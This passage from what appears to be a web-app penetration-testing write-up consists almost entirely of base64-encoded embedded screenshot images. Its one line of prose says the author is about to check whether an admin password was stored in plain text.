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) So, that looks like everything available in the web app for this user... let's see if that `admin` password was indeed stored in plain text ![](data:image/png;base64,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